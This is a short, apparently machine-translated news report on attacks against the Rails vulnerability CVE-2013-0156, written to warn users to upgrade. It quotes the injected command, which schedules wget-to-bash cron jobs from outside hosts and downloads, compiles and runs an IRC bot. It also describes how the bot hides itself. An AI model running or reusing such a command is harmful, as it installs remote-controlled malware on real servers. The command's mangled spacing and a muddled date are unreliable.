In the past few days, more and more attackers have attempted to attack servers through a security vulnerability in the Rails framework. A successful intruder installs a robot on the server so that it waits for further instructions from the IRC channel.
Security Expert Jeff Jarmoc wrote in his blog that attackers attempted to attack through the CVE 2013-0156 vulnerability. Although the vulnerability was closed in May January, many servers still run outdated Ruby versions. Jarmoc said the attacker attempted to inject the following command:
Crontab-r; echo \ "1 ***** wget-O-colkolduld.com/cmd1 | bash; wget-O-lochjol.com/cmd2 | bash; wget-O-ddos.cat.com/cmd3 | bash; \ "| crontab-; wget http: // 88.198.20.247/k. c-O/tmp/k. c; gcc-o/tmp/k. c; chmod + x/tmp/k;/tmp/k | wget http: // 88.198.20.247/k-O/tmp/k & chmod + x/tmp/k &/tmp/k
This causes the system to automatically download and compile the bot (k. c) and execute it. Jarmoc also published the source code of the bot program on its blog. "K" tries to contact the IRC server located in the cvv4you.ru domain, and then joins the # rails channel, waiting for further attack instructions. Jarmoc indicates that k programs can download and execute arbitrary code through commands. At present, the IRC server can be unavailable, at least the current address is unavailable.
The BOT program is displayed as "-bash" in the process list. At startup, A/tmp/tan. pid file is created to ensure that only one process instance runs at a time. All users using the Rails framework should confirm that they are using the current Rails version. The current reliable versions include 3.2.13, 3.1.12 and 2.3.18.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
